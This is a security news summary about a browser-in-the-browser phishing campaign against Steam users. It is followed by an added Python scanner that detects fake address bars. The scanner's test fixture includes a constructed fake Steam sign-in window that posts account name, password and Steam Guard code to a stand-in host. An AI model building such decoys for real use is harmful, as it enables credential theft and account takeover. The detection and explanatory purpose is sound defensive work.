"Steam Gaming Phish Showcases Browser-in-Browser Threat"

Attackers have been targeting users of the Steam online gaming platform with a phishing tactic that uses authentic-looking fake browser windows to steal credentials and take over accounts. The widespread campaign serves as a warning to businesses that the technique belongs on their security radar.

The technique, called "browser-in-the-browser," was published about seven months ago by the researcher known as "mr.d0x." It renders, inside the attacker's own page, a pop-up or new-tab-style window that looks like any other browser window. According to Group-IB researchers, this window is actually a phishing page that harvests credentials, letting attackers defraud Steam gamers of potentially thousands of dollars. Targeting Steam users is not new, but the browser-in-the-browser method is, and it is why this campaign is succeeding where others have failed, according to Group-IB's Ivan Lebedev, head of the CERT-GIB anti-phishing and global cooperation group, and Dmitry Eroshev, CERT-GIB analyst.

Browser-in-the-browser phishing begins like a traditional phishing campaign, with a malicious message carrying some sort of offer. In the Steam campaign, the researchers report, attackers message a Steam user asking them to join a team for a tournament within the platform, vote for the user's favorite team, or buy discounted tickets to e-sports events, among other lures. The researchers have also seen attacks that enticed viewers of a popular gameplay video to visit another site to claim a free in-game skin; that lure shows an ad redirecting users to the phishing website both on screen and in the video description.

Clicking almost any button on one of the bait webpages opens an account data-entry form that looks like a legitimate Steam window. The window includes a fake green lock icon, a fake URL field whose text can be copied, and even an additional Steam Guard window for two-factor authentication (2FA) to make it appear authentic. Because the lock and the URL are drawn by the page rather than by the browser, they say nothing about where the entered credentials are actually sent. This article continues to discuss the browser-in-the-browser phishing campaign targeting Steam users.
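The fake address bar is the detectable weak point of a browser-in-the-browser decoy: the URL it shows is page content, so it can be compared with the origin the document was really served from. The following scanner is an added example written for this summary, not code from Group-IB, Dark Reading or mr.d0x. It parses an HTML document with the standard library, collects every URL rendered as visible text or as an input value (link targets in href are not "displayed" and are left alone), and flags those whose host belongs to a watched brand while the page itself came from a different origin. The brand list, the sample pages and the host names in them (tournament-invite.example, blog.example) are constructed for the example.

```python
"""Heuristic scan for browser-in-the-browser (BitB) address-bar decoys.

Added illustration, not code from the page's sources. A BitB window paints
its padlock and URL as ordinary page content, so the URL it displays never
matches the origin the document was actually served from (location.origin
in a content script, or the fetch URL for a crawler). Flag displayed URLs
that name a watched brand while the page came from somewhere else.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Assumed brand list for the Steam case; a real deployment would load it
# from configuration.
WATCHED_HOSTS = ("steamcommunity.com", "steampowered.com")


def host_of(url):
    """Lower-cased host of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def is_watched(host, watched=WATCHED_HOSTS):
    """True if host is a watched brand domain or one of its subdomains."""
    return any(host == w or host.endswith("." + w) for w in watched)


class DisplayedUrlCollector(HTMLParser):
    """Collect URLs a user would see on screen: text nodes and input values."""

    def __init__(self):
        super().__init__()
        self.displayed = []
        self._skip_depth = 0      # >0 while inside <script>/<style>
        self._anchor_hosts = []   # host of the enclosing <a href>, if any

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        attrs = dict(attrs)
        if tag == "a":
            self._anchor_hosts.append(host_of(attrs.get("href") or ""))
        if tag == "input":
            # A read-only <input value="https://..."> is the classic BitB
            # address bar: it looks like chrome and its text can be copied.
            for name in ("value", "placeholder"):
                if attrs.get(name):
                    self._record(attrs[name])

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag == "a" and self._anchor_hosts:
            self._anchor_hosts.pop()

    def handle_data(self, data):
        if not self._skip_depth:
            self._record(data)

    def _record(self, text):
        for url in URL_RE.findall(text):
            url = url.rstrip(".,;:)")
            # A URL shown as the text of a real link pointing at the same
            # host is an honest link, not a decoy; keep it out of the results.
            if self._anchor_hosts and self._anchor_hosts[-1] == host_of(url):
                continue
            self.displayed.append(url)


def scan(html, page_origin, watched=WATCHED_HOSTS):
    """Return displayed URLs that impersonate a watched brand on a foreign page."""
    if is_watched(host_of(page_origin), watched):
        return []  # the brand's own pages may legitimately show their URLs
    collector = DisplayedUrlCollector()
    collector.feed(html)
    collector.close()
    hits = [u for u in collector.displayed if is_watched(host_of(u), watched)]
    return list(dict.fromkeys(hits))  # de-duplicate, keep first-seen order


# Constructed decoy modelled on the description above: a div styled as a
# window, a padlock glyph, a copyable URL field, a Steam Guard prompt, and a
# form that posts to the attacker's own (hypothetical) host.
DECOY_HTML = """<html><body>
<button onclick="openSignIn()">Vote for your favorite team</button>
<div id="fake-window" style="position:fixed;top:80px;left:200px;width:720px">
  <div class="titlebar">Sign In - Steam Community</div>
  <div class="addressbar">&#128274; <input type="text" readonly value="https://steamcommunity.com/openid/login?openid.mode=checkid_setup"></div>
  <form method="post" action="https://tournament-invite.example/collect">
    <input name="username" placeholder="Steam account name">
    <input name="password" type="password">
    <input name="steamguard" placeholder="Steam Guard code">
    <button>Sign in</button>
  </form>
</div>
<script>function openSignIn(){document.getElementById('fake-window').style.display='block'}</script>
</body></html>"""

# Constructed benign page: a blog linking to a Steam URL whose href matches.
BENIGN_HTML = """<p>Grab the sale: <a href="https://store.steampowered.com/specials">https://store.steampowered.com/specials</a></p>"""

# Constructed mismatched link: Steam URL as link text, attacker host as target.
MISMATCHED_LINK_HTML = """<p>Log in here: <a href="https://tournament-invite.example/collect">https://steamcommunity.com/login/home/</a></p>"""

if __name__ == "__main__":
    print("decoy:", scan(DECOY_HTML, "https://tournament-invite.example"))
    print("benign:", scan(BENIGN_HTML, "https://blog.example"))
    print("mismatched link:", scan(MISMATCHED_LINK_HTML, "https://tournament-invite.example"))
    print("brand's own page:", scan(DECOY_HTML, "https://steamcommunity.com"))
```

The check is a heuristic, and its blind spot is worth knowing: a kit that draws the address bar as an image or on a canvas shows the scanner no text at all. The user-side test that does not depend on how the decoy is drawn is to drag the "window" past the edge of the real browser window; a genuine pop-up moves off the edge, while a browser-in-the-browser decoy is clipped by the page that contains it. A password manager keyed to the real origin will also decline to fill the decoy's form.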

Dark Reading reports "Steam Gaming Phish Showcases Browser-in-Browser Threat"
